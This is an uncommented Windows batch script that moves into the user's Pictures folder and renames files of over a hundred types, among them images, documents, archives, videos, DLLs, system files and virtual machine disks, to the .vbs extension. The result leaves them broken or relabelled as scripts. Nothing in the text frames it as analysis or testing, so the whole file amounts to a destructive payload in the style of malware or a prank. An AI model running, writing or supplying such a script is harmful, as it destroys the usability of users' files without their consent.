cd C:\Users\%username%\pictures
ren *.bat *.vbs
ren *.jpg *.vbs
ren *.hta *.vbs
ren *.html *.vbs
ren *.png *.vbs
ren *.gif *.vbs
ren *.ico *.vbs
ren *.mp3 *.vbs
ren *.mp4 *.vbs
ren *.mp2 *.vbs
ren *.wav *.vbs
ren *.rar *.vbs
ren *.docx *.vbs
ren *.rtf *.vbs
ren *.lnk *.vbs
ren *.iso *.vbs
ren *.torrent *.vbs
ren *.cmd *.vbs
ren *.pptx *.vbs
ren *.7z *.vbs
ren *.tar *.vbs
ren *.js *.vbs
ren *.jar *.vbs
ren *.json *.vbs
ren *.log *.vbs
ren *.pdf *.vbs
ren *.xls *.vbs
ren *.jpeg *.vbs
ren *.vbox *.vbs
ren *.vmdk *.vbs
ren *.vmx *.vbs
ren *. *.vbs
ren *.webp *.vbs
ren *.ttf *.vbs
ren *.sfnt *.vbs
ren *.swf *.vbs
ren *.ps1 *.vbs
ren *.scr *.vbs
ren *.arj *.vbs
ren *.ace *.vbs
ren *.lhz *.vbs
ren *.doc *.vbs
ren *.asm *.vbs
ren *.wp *.vbs
ren *.mdb *.vbs
ren *.ppt *.vbs
ren *.avi *.vbs
ren *.mpeg *.vbs
ren *.asf *.vbs
ren *.rm *.vbs
ren *.mov *.vbs
ren *.mp *.vbs
ren *.mod *.vbs
ren *.mid *.vbs
ren *.bmp *.vbs
ren *.smc *.vbs
ren *.gb *.vbs
ren *.gbc *.vbs
ren *.sb *.vbs
ren *.sb2 *.vbs
ren *.sb3 *.vbs
ren *.gba *.vbs
ren *.reg *.vbs
ren *.ini *.vbs
ren *.db *.vbs
ren *.xml *.vbs
ren *.dmp *.vbs
ren *.ocx *.vbs
ren *.bin *.vbs
ren *.dll *.vbs
ren *.prx *.vbs
ren *.nls *.vbs
ren *.sys *.vbs
ren *.img *.vbs
ren *.tmp *.vbs
ren *.vcxproj *.vbs
ren *.ogg *.vbs
ren *.eps *.vbs
ren *.psd *.vbs
ren *.htm *.vbs
ren *.css *.vbs
ren *.ai *.vbs
ren *.id *.vbs
ren *.php *.vbs
ren *.tiff *.vbs
ren *.mpg *.vbs
ren *.raw *.vbs
ren *.mkv *.vbs
ren *.dwg *.vbs
ren *.cdr *.vbs
ren *.hlp *.vbs
ren *.indd *.vbs
ren *.sql *.vbs
ren *.xml *.vbs
ren *.wmv *.vbs
ren *.midi *.vbs
ren *.flv *.vbs
ren *.fla *.vbs
ren *.cad *.vbs
ren *.dmg *.vbs
ren *.3ds *.vbs
ren *.aaq *.vbs
ren *.vir *.vbs
ren *.vmxf *.vbs
ren *.nvram *.vbs
ren *.vmem *.vbs
ren *.vmsd *.vbs
exit
